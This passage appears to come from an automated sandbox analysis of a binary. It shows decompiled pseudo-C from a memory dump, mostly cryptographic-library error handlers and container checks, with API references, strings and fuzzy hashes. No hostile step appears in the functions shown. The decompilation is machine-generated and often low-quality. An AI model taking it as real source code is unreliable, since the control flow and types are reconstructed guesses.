                    				signed int _t26;
                    				signed int _t27;
                    				void* _t30;
                    				void* _t31;
                    				intOrPtr _t32;
                    				intOrPtr _t33;
                    				intOrPtr* _t36;
                    				intOrPtr* _t37;
                    
                    				_push(__ecx);
                    				_t23 = _a4;
                    				if(_t23 == 0) {
                    					L21:
                    					_t15 = E01406FCE(_t23, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
                    					__eflags = _t15;
                    					if(_t15 != 0) {
                    						_t16 = _v8;
                    						__eflags = _t16;
                    						if(_t16 == 0) {
                    							_t16 = GetACP();
                    						}
                    						L25:
                    						return _t16;
                    					}
                    					L22:
                    					_t16 = 0;
                    					goto L25;
                    				}
                    				_t17 = 0;
                    				if( *_t23 == 0) {
                    					goto L21;
                    				}
                    				_t36 = 0x14297a0;
                    				_t25 = _t23;
                    				while(1) {
                    					_t30 =  *_t25;
                    					if(_t30 !=  *_t36) {
                    						break;
                    					}
                    					if(_t30 == 0) {
                    						L7:
                    						_t26 = _t17;
                    						L9:
                    						if(_t26 == 0) {
                    							goto L21;
                    						}
                    						_t37 = 0x14297a8;
                    						_t27 = _t23;
                    						while(1) {
                    							_t31 =  *_t27;
                    							if(_t31 !=  *_t37) {
                    								break;
                    							}
                    							if(_t31 == 0) {
                    								L17:
                    								_t49 = _t17;
                    								if(_t17 != 0) {
                    									_t16 = E0140663B(_t23, _t23);
                    									goto L25;
                    								}
                    								if(E01406FCE(_t23, _t49, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
                    									goto L22;
                    								}
                    								_t16 = _v8;
                    								goto L25;
                    							}
                    							_t32 =  *((intOrPtr*)(_t27 + 2));
                    							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
                    								break;
                    							}
                    							_t27 = _t27 + 4;
                    							_t37 = _t37 + 4;
                    							if(_t32 != 0) {
                    								continue;
                    							}
                    							goto L17;
                    						}
                    						asm("sbb eax, eax");
                    						_t17 = _t17 | 0x00000001;
                    						__eflags = _t17;
                    						goto L17;
                    					}
                    					_t33 =  *((intOrPtr*)(_t25 + 2));
                    					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
                    						break;
                    					}
                    					_t25 = _t25 + 4;
                    					_t36 = _t36 + 4;
                    					if(_t33 != 0) {
                    						continue;
                    					}
                    					goto L7;
                    				}
                    				asm("sbb edx, edx");
                    				_t26 = _t25 | 0x00000001;
                    				__eflags = _t26;
                    				goto L9;
                    			}


















                    APIs
                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0140F56D,00000000,00000050,?,?,?,?,?), ref: 0140F3ED
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ACP$OCP
                    • API String ID: 0-711371036
                    • Opcode ID: ea262c73f9b143e0cd834b04ca4008e8dd5ae9133f6b635a33f68356ac2e8adb
                    • Instruction ID: 6e9d8e7e575f347ca3cca5c2a5cea21addbb64e3f99d5218ce9b430e76b04e5b
                    • Opcode Fuzzy Hash: ea262c73f9b143e0cd834b04ca4008e8dd5ae9133f6b635a33f68356ac2e8adb
                    • Instruction Fuzzy Hash: 73210662A04101A7E7339E6BC901B9B7396EF94A34F564437E909D73A0F732E909C390
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 21%
                    			E013EAF34(void* __ebx, void* __edx, void* __eflags, signed int _a4) {
                    				intOrPtr _v8;
                    				char _v16;
                    				intOrPtr* _v20;
                    				intOrPtr* _v24;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t20;
                    				intOrPtr _t24;
                    				signed int _t32;
                    				intOrPtr* _t33;
                    				void* _t36;
                    				signed int _t38;
                    				intOrPtr* _t41;
                    				void* _t43;
                    				signed int _t46;
                    
                    				_t36 = __edx;
                    				_t29 = __ebx;
                    				_t33 = _v20;
                    				E013EC2E0(__ebx, _t43);
                    				E013F4EC6(0, 0);
                    				asm("int3");
                    				asm("int3");
                    				asm("int3");
                    				asm("int3");
                    				asm("int3");
                    				asm("int3");
                    				asm("int3");
                    				asm("int3");
                    				asm("int3");
                    				asm("int3");
                    				asm("int3");
                    				_push(_t43);
                    				_push(0xffffffff);
                    				_push(E01417F50);
                    				_push( *[fs:0x0]);
                    				_push(__ebx);
                    				_t20 =  *0x1435234; // 0x78d9f939
                    				_push(_t20 ^ _t46);
                    				 *[fs:0x0] =  &_v16;
                    				_v20 = _t46 - 8;
                    				_t41 = _t33;
                    				_v24 = _t41;
                    				_t38 = _a4;
                    				 *_t41 = 0;
                    				 *((intOrPtr*)(_t41 + 4)) = 0;
                    				 *((intOrPtr*)(_t41 + 8)) = 0;
                    				if(_t38 != 0) {
                    					_t52 = _t38 - 0xaaaaaaa;
                    					if(_t38 > 0xaaaaaaa) {
                    						_push("vector<T> too long");
                    						E013F0F81(_t36, _t38, _t41, _t52);
                    					}
                    					_push(_t38);
                    					_t24 = E013EC480(_t29, _t36);
                    					_push(_a4);
                    					 *_t41 = _t24;
                    					 *((intOrPtr*)(_t41 + 4)) = _t24;
                    					_t32 = _t38 + _t38 * 2 << 3;
                    					_push(_t41);
                    					_v8 = 0;
                    					 *((intOrPtr*)(_t41 + 8)) =  *_t41 + _t32;
                    					E013EAC80( *_t41, _t38);
                    					 *((intOrPtr*)(_t41 + 4)) =  *((intOrPtr*)(_t41 + 4)) + _t32;
                    				}
                    				 *[fs:0x0] = _v16;
                    				return _t41;
                    			}



















                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013EAF40
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    • std::_Xinvalid_argument.LIBCPMT ref: 013EAFA8
                      • Part of subcall function 013F0F81: std::invalid_argument::invalid_argument.LIBCONCRT ref: 013F0F8D
                      • Part of subcall function 013F0F81: __CxxThrowException@8.LIBVCRUNTIME ref: 013F0F9B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw$ExceptionRaiseXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                    • String ID: vector<T> too long
                    • API String ID: 3797282997-3788999226
                    • Opcode ID: b6cf86b1045ac31da6b0aeb5289fbb0a06058ec6ba63c52737732560d8b49103
                    • Instruction ID: a6b98d1da079f752e0245ab739951d12143e0a998ce63b6c19e64ef210f8bc9a
                    • Opcode Fuzzy Hash: b6cf86b1045ac31da6b0aeb5289fbb0a06058ec6ba63c52737732560d8b49103
                    • Instruction Fuzzy Hash: 4211D072900305ABD720DF1DCC41B9BFBF4FB14B14F10462EE85893680D7716904CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E013CF0A0(void* __ecx, intOrPtr* _a4) {
                    				char _v8;
                    				char _v16;
                    				signed int _v20;
                    				intOrPtr _v24;
                    				char _v28;
                    				char _v44;
                    				intOrPtr _v48;
                    				char _v60;
                    				intOrPtr _v64;
                    				char _v68;
                    				char _v84;
                    				char _v88;
                    				char _v92;
                    				void* __ebp;
                    				signed int _t31;
                    				signed int _t32;
                    				char _t36;
                    				void* _t54;
                    				void* _t55;
                    				signed int _t57;
                    
                    				_t31 =  *0x1435234; // 0x78d9f939
                    				_t32 = _t31 ^ _t57;
                    				_v20 = _t32;
                    				 *[fs:0x0] =  &_v16;
                    				_t55 = __ecx;
                    				_v92 = 0;
                    				_v88 = 0;
                    				_t36 =  *((intOrPtr*)( *((intOrPtr*)( *_a4 + 4))))("OutputBuffer", 0x1437f18,  &_v92, _t32, _t54,  *[fs:0x0], E01416A70, 0xffffffff);
                    				_t60 = _t36;
                    				if(_t36 == 0) {
                    					_v64 = 0xf;
                    					_v68 = 0;
                    					_v84 = _t36;
                    					E013C64B7( &_v84, _t60, "ArraySink: missing OutputBuffer argument", 0x28);
                    					asm("xorps xmm0, xmm0");
                    					_v8 = 0;
                    					asm("movq [ebp-0x34], xmm0");
                    					_v8 = 1;
                    					_v60 = 0x141a7b8;
                    					_v48 = 1;
                    					_v24 = 0xf;
                    					_v28 = 0;
                    					_v44 = 0;
                    					E013C63D3( &_v44,  &_v92,  &_v84, 0, 0xffffffff);
                    					_v8 = 0;
                    					_v60 = 0x141a97c;
                    					E013F4EC6( &_v60, 0x1430adc);
                    				}
                    				 *((intOrPtr*)(_t55 + 0xc)) = _v92;
                    				 *((intOrPtr*)(_t55 + 0x10)) = _v88;
                    				 *[fs:0x0] = _v16;
                    				return E013F268B(_v88, _v20 ^ _t57);
                    			}
























                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013CF16C
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    • ArraySink: missing OutputBuffer argument, xrefs: 013CF0F7
                    • OutputBuffer, xrefs: 013CF0D7
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: ExceptionException@8RaiseThrow
                    • String ID: ArraySink: missing OutputBuffer argument$OutputBuffer
                    • API String ID: 3976011213-3781944848
                    • Opcode ID: 70b727a2f2d2cd855c00f70b76f317621f44b7af0e71388add5f877eeddc7420
                    • Instruction ID: 3ab6936f4e52f86c09a33df1cfaada385ea897dbe5bb20f6a85fd8e83dec3f6f
                    • Opcode Fuzzy Hash: 70b727a2f2d2cd855c00f70b76f317621f44b7af0e71388add5f877eeddc7420
                    • Instruction Fuzzy Hash: 4D3159B0944349AFDB00CFD8D884BDEBBF4EB19714F20421EE411BB394D7B55A488B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 54%
                    			E013D1D50(void* __ebx, intOrPtr* __ecx, void* __edi, void* __ebp, char _a4) {
                    				intOrPtr _v12;
                    				intOrPtr* _v20;
                    				void* __esi;
                    				intOrPtr _t20;
                    				intOrPtr* _t27;
                    				intOrPtr* _t29;
                    				void* _t31;
                    				void* _t34;
                    				signed int _t39;
                    				intOrPtr* _t41;
                    				intOrPtr _t43;
                    				intOrPtr* _t45;
                    
                    				_t29 = __ecx;
                    				_push(__ebx);
                    				_t27 = __ecx;
                    				_push(__ebp);
                    				_t45 = _a4;
                    				 *__ecx = 0;
                    				 *((intOrPtr*)(__ecx + 4)) = 0;
                    				 *((intOrPtr*)(__ecx + 8)) = 0;
                    				_t4 =  &_a4; // 0x142e86c
                    				_t39 =  *_t4 -  *_t45 >> 2;
                    				 *__ecx = 0;
                    				 *((intOrPtr*)(__ecx + 4)) = 0;
                    				 *((intOrPtr*)(__ecx + 8)) = 0;
                    				if(_t39 == 0) {
                    					L3:
                    					return _t27;
                    				} else {
                    					if(_t39 > 0x3fffffff) {
                    						_push("vector<T> too long");
                    						E013F0F81(_t31, __edi, _t39, __eflags);
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						_push(_t29);
                    						_push(_t39);
                    						_t41 = _t29;
                    						_v20 = _t41;
                    						E013C3153(_t29, _v12);
                    						 *_t41 = 0x141ccc8;
                    						return _t41;
                    					} else {
                    						_t20 = E013E2C10(__ecx, _t31, _t45, _t39, __edi);
                    						 *_t27 = _t20;
                    						 *((intOrPtr*)(_t27 + 4)) = _t20;
                    						 *((intOrPtr*)(_t27 + 8)) =  *_t27 + _t39 * 4;
                    						_t11 =  &_a4; // 0x142e86c
                    						_t34 =  *_t11 -  *_t45;
                    						_t43 =  *_t27;
                    						E013F47C0(_t43,  *_t45, _t34);
                    						 *((intOrPtr*)(_t27 + 4)) = _t34 + _t43;
                    						goto L3;
                    					}
                    				}
                    			}
















                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 013D1DD3
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 013D1DEC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: Xinvalid_argumentstd::_std::invalid_argument::invalid_argument
                    • String ID: vector<T> too long
                    • API String ID: 1997705970-3788999226
                    • Opcode ID: 25cc2e984894404302fe5c49c094fc7ed3b36f3a8c7c8fcdde6b1a8d224a822c
                    • Instruction ID: 37267dc4f41fea2c15addbd2950c186812ef7f6f10aebbd20f236bf1c993f3cc
                    • Opcode Fuzzy Hash: 25cc2e984894404302fe5c49c094fc7ed3b36f3a8c7c8fcdde6b1a8d224a822c
                    • Instruction Fuzzy Hash: 1F113DB25012249FDB10DF5CD884B4ABBE8EF55714F14C56AE9089F349D771E904CBE1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 66%
                    			E013C2C47(intOrPtr* __ecx) {
                    				intOrPtr* _t41;
                    				intOrPtr* _t46;
                    				void* _t48;
                    
                    				_t41 = __ecx;
                    				_push(0x1c);
                    				E013F26F6(E0141567D);
                    				_t46 = _t41;
                    				 *((intOrPtr*)(_t48 - 0x18)) = _t46;
                    				_push(0);
                    				 *((intOrPtr*)(_t48 - 0x1c)) = _t46;
                    				 *((intOrPtr*)(_t48 - 0x14)) =  *((intOrPtr*)(_t48 + 8));
                    				E013CE1A0();
                    				 *_t46 = 0x141b4cc;
                    				 *((intOrPtr*)(_t46 + 4)) = 0x141b590;
                    				 *((intOrPtr*)(_t46 + 0x18)) = 0;
                    				 *((intOrPtr*)(_t46 + 0x1c)) = 0;
                    				 *((intOrPtr*)(_t46 + 0x20)) = 0;
                    				 *((intOrPtr*)(_t46 + 0x24)) = 0;
                    				 *((intOrPtr*)(_t46 + 0x28)) = 0;
                    				 *((intOrPtr*)(_t46 + 0x2c)) = 0;
                    				 *(_t46 + 0x34) =  *(_t46 + 0x34) | 0xffffffff;
                    				 *((intOrPtr*)(_t48 - 4)) = 0;
                    				 *((intOrPtr*)(_t46 + 0x38)) = 0;
                    				 *((intOrPtr*)(_t46 + 0x3c)) = 0;
                    				 *((char*)(_t48 - 4)) = 2;
                    				E013CEA70(_t46,  *((intOrPtr*)(_t48 + 0x10)));
                    				_push(1);
                    				_push(_t48 - 0x14);
                    				_push("DecodingLookupArray");
                    				_push(_t48 - 0x28);
                    				_push( *(E013C20AD() + 8) & 0x000000ff);
                    				 *((char*)(_t48 - 4)) = 3;
                    				_push(_t48 + 0xc);
                    				_push("Log2Base");
                    				E013E8FB0(0, _t46,  *(_t46 + 0x34), E013C1E98(_t32,  *(_t46 + 0x34)));
                    				E013C3BEC(_t48 - 0x24);
                    				return E013F26B1(_t46);
                    			}







                    APIs
                    • __EH_prolog3_GS.LIBCMT ref: 013C2C4E
                      • Part of subcall function 013C20AD: __EH_prolog3.LIBCMT ref: 013C20B4
                      • Part of subcall function 013C1E98: __EH_prolog3.LIBCMT ref: 013C1E9F
                      • Part of subcall function 013C1E98: new.LIBCMT ref: 013C1EAB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: H_prolog3$H_prolog3_
                    • String ID: DecodingLookupArray$Log2Base
                    • API String ID: 4240126716-3088352070
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E013C4A60(intOrPtr* __ecx) {
                    				void* _t20;
                    				intOrPtr _t22;
                    				intOrPtr* _t31;
                    				intOrPtr* _t33;
                    				intOrPtr* _t37;
                    				void* _t38;
                    
                    				_t31 = __ecx;
                    				_push(0x40);
                    				E013F26C2(E01415A99);
                    				_t37 = _t31;
                    				if( *((char*)(_t38 + 0xc)) != 0 &&  *((intOrPtr*)( *_t37 + 0xbc))() == 0) {
                    					E013C2AD0(_t38 - 0x24, "Unflushable<T>: this object has buffered input that cannot be flushed");
                    					 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                    					_push(_t38 - 0x24);
                    					_push(2);
                    					E013C2E51(_t38 - 0x4c);
                    					 *((intOrPtr*)(_t38 - 0x4c)) = 0x141a994;
                    					E013F4EC6(_t38 - 0x4c, 0x1430bd4);
                    				}
                    				_t33 =  *((intOrPtr*)( *_t37 + 0xa4))();
                    				if(_t33 == 0) {
                    					L6:
                    					_t20 = 0;
                    				} else {
                    					_t22 =  *((intOrPtr*)(_t38 + 0x10));
                    					if(_t22 == 0) {
                    						goto L6;
                    					} else {
                    						_t20 =  *((intOrPtr*)( *_t33 + 0x90))( *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t22 - 1,  *((intOrPtr*)(_t38 + 0x14)));
                    					}
                    				}
                    				return E013F269C(_t20);
                    			}










                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C4A67
                      • Part of subcall function 013C2E51: __EH_prolog3.LIBCMT ref: 013C2E58
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013C4AAF
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    • Unflushable<T>: this object has buffered input that cannot be flushed, xrefs: 013C4A80
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: H_prolog3$ExceptionException@8RaiseThrow
                    • String ID: Unflushable<T>: this object has buffered input that cannot be flushed
                    • API String ID: 1412866469-3781273281
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 80%
                    			E013C3219(void* __ebx, intOrPtr* __ecx, void* __edx, void* __eflags) {
                    				void* _t14;
                    				void* _t16;
                    				intOrPtr* _t26;
                    				void* _t32;
                    				intOrPtr* _t34;
                    				void* _t35;
                    
                    				_t32 = __edx;
                    				_t26 = __ecx;
                    				_push(0x4c);
                    				E013F26C2(E01415BF7);
                    				_t34 = _t26;
                    				 *((intOrPtr*)(_t35 - 0x10)) = _t34;
                    				_t14 = E013C2AD0(_t35 - 0x58, "AlgorithmParametersBase: parameter \"");
                    				 *((intOrPtr*)(_t35 - 4)) = 0;
                    				_t16 = E013C1DF7(__ebx, _t35 - 0x58, _t32, _t35 - 0x40, _t14,  *((intOrPtr*)(_t35 + 8)));
                    				 *((char*)(_t35 - 4)) = 1;
                    				_push(E013C1DF7(__ebx, _t35 - 0x58, _t32, _t35 - 0x28, _t16, "\" not used"));
                    				_push(6);
                    				 *((char*)(_t35 - 4)) = 2;
                    				E013C2E51(_t34);
                    				E013C6118(_t35 - 0x28, 1, 0);
                    				E013C6118(_t35 - 0x40, 1, 0);
                    				E013C6118(_t35 - 0x58, 1, 0);
                    				 *_t34 = 0x141ab2c;
                    				return E013F269C(_t34);
                    			}










                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C3220
                      • Part of subcall function 013C2E51: __EH_prolog3.LIBCMT ref: 013C2E58
                    Strings
                    • " not used, xrefs: 013C3249
                    • AlgorithmParametersBase: parameter ", xrefs: 013C322A
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: H_prolog3
                    • String ID: " not used$AlgorithmParametersBase: parameter "
                    • API String ID: 431132790-612349224
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 71%
                    			E013C5328() {
                    				signed int _v4;
                    				char _v36;
                    				char _v60;
                    				char _v100;
                    				intOrPtr* _t15;
                    				void* _t16;
                    				void* _t23;
                    				intOrPtr* _t24;
                    				char* _t27;
                    
                    				E013F26C2(E01415B5E);
                    				_t15 =  *((intOrPtr*)( *_t24 + 0x34))(0x58);
                    				_t16 =  *((intOrPtr*)( *_t15 + 8))( &_v36);
                    				_v4 = _v4 & 0x00000000;
                    				_push(E013C1DF7(_t23, _t15,  *_t15,  &_v60, _t16, ": this object doesn\'t support resynchronization"));
                    				_push(0);
                    				_t27 =  &_v100;
                    				_v4 = 1;
                    				E013C2E51(_t27);
                    				_v100 = 0x141a7e4;
                    				E013F4EC6( &_v100, 0x142fa1c);
                    				asm("int3");
                    				goto ( *((intOrPtr*)( *((intOrPtr*)(_t27 + 0xfffffff8)) + 0xc)));
                    			}













                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C532F
                      • Part of subcall function 013C2E51: __EH_prolog3.LIBCMT ref: 013C2E58
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013C5379
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    • : this object doesn't support resynchronization, xrefs: 013C5348
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: H_prolog3$ExceptionException@8RaiseThrow
                    • String ID: : this object doesn't support resynchronization
                    • API String ID: 1412866469-2714550406
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 55%
                    			E013C568E(intOrPtr* __ecx) {
                    				intOrPtr* _t20;
                    				void* _t23;
                    
                    				_t20 = __ecx;
                    				_push(0x40);
                    				E013F26C2(E01415A99);
                    				_push( *((intOrPtr*)(_t23 + 0xc)));
                    				_push( *((intOrPtr*)(_t23 + 8)));
                    				if( *((intOrPtr*)( *_t20 + 0xc))() == 0) {
                    					E013C2AD0(_t23 - 0x24, "CryptoMaterial: this object contains invalid values");
                    					 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
                    					_push(_t23 - 0x24);
                    					_push(4);
                    					E013C2E51(_t23 - 0x4c);
                    					 *((intOrPtr*)(_t23 - 0x4c)) = 0x141aaac;
                    					_t14 = E013F4EC6(_t23 - 0x4c, 0x1430afc);
                    				}
                    				return E013F269C(_t14);
                    			}






                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C5695
                      • Part of subcall function 013C2E51: __EH_prolog3.LIBCMT ref: 013C2E58
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013C56D8
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    • CryptoMaterial: this object contains invalid values, xrefs: 013C56A9
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: H_prolog3$ExceptionException@8RaiseThrow
                    • String ID: CryptoMaterial: this object contains invalid values
                    • API String ID: 1412866469-887990677
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 71%
                    			E013C542E(void* __ecx) {
                    				intOrPtr _t12;
                    				void* _t18;
                    				void* _t21;
                    
                    				_t18 = __ecx;
                    				_push(0x40);
                    				E013F26C2(E01415A99);
                    				_t12 =  *((intOrPtr*)(_t21 + 8));
                    				if(_t12 != 0 && _t12 !=  *((intOrPtr*)(_t18 + 0x14))) {
                    					E013C2AD0(_t21 - 0x24, "CipherModeBase: feedback size cannot be specified for this cipher mode");
                    					 *(_t21 - 4) =  *(_t21 - 4) & 0x00000000;
                    					_push(_t21 - 0x24);
                    					_push(1);
                    					E013C2E51(_t21 - 0x4c);
                    					 *((intOrPtr*)(_t21 - 0x4c)) = 0x141a97c;
                    					_t12 = E013F4EC6(_t21 - 0x4c, 0x1430adc);
                    				}
                    				return E013F269C(_t12);
                    			}







                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C5435
                      • Part of subcall function 013C2E51: __EH_prolog3.LIBCMT ref: 013C2E58
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013C5475
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    • CipherModeBase: feedback size cannot be specified for this cipher mode, xrefs: 013C5446
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: H_prolog3$ExceptionException@8RaiseThrow
                    • String ID: CipherModeBase: feedback size cannot be specified for this cipher mode
                    • API String ID: 1412866469-2561568580
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E013C4BD0(void* __eflags) {
                    				void* _t18;
                    				void* _t19;
                    
                    				_push(0x40);
                    				E013F26C2(E01415A99);
                    				E013C2AD0(_t19 - 0x24, "BufferedTransformation: this object is not attachable");
                    				 *(_t19 - 4) =  *(_t19 - 4) & 0x00000000;
                    				_push(_t19 - 0x24);
                    				_push(0);
                    				_t18 = _t19 - 0x4c;
                    				E013C2E51(_t18);
                    				 *((intOrPtr*)(_t19 - 0x4c)) = 0x141a7e4;
                    				E013F4EC6(_t19 - 0x4c, 0x142fa1c);
                    				asm("int3");
                    				return  *((intOrPtr*)(_t18 + 0x24));
                    			}






                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C4BD7
                      • Part of subcall function 013C2E51: __EH_prolog3.LIBCMT ref: 013C2E58
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013C4C0B
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    • BufferedTransformation: this object is not attachable, xrefs: 013C4BDC
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: H_prolog3$ExceptionException@8RaiseThrow
                    • String ID: BufferedTransformation: this object is not attachable
                    • API String ID: 1412866469-3944187330
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E013C1B45(void* __eflags) {
                    				intOrPtr* _t30;
                    				char* _t35;
                    				intOrPtr _t36;
                    				char* _t38;
                    				void* _t39;
                    
                    				_push(0x40);
                    				E013F26C2(E01415A99);
                    				E013C2AD0(_t39 - 0x24, "Clone() is not implemented yet.");
                    				 *(_t39 - 4) =  *(_t39 - 4) & 0x00000000;
                    				_push(_t39 - 0x24);
                    				_push(0);
                    				_t35 = _t39 - 0x4c;
                    				E013C2E51(_t35);
                    				 *((intOrPtr*)(_t39 - 0x4c)) = 0x141a7e4;
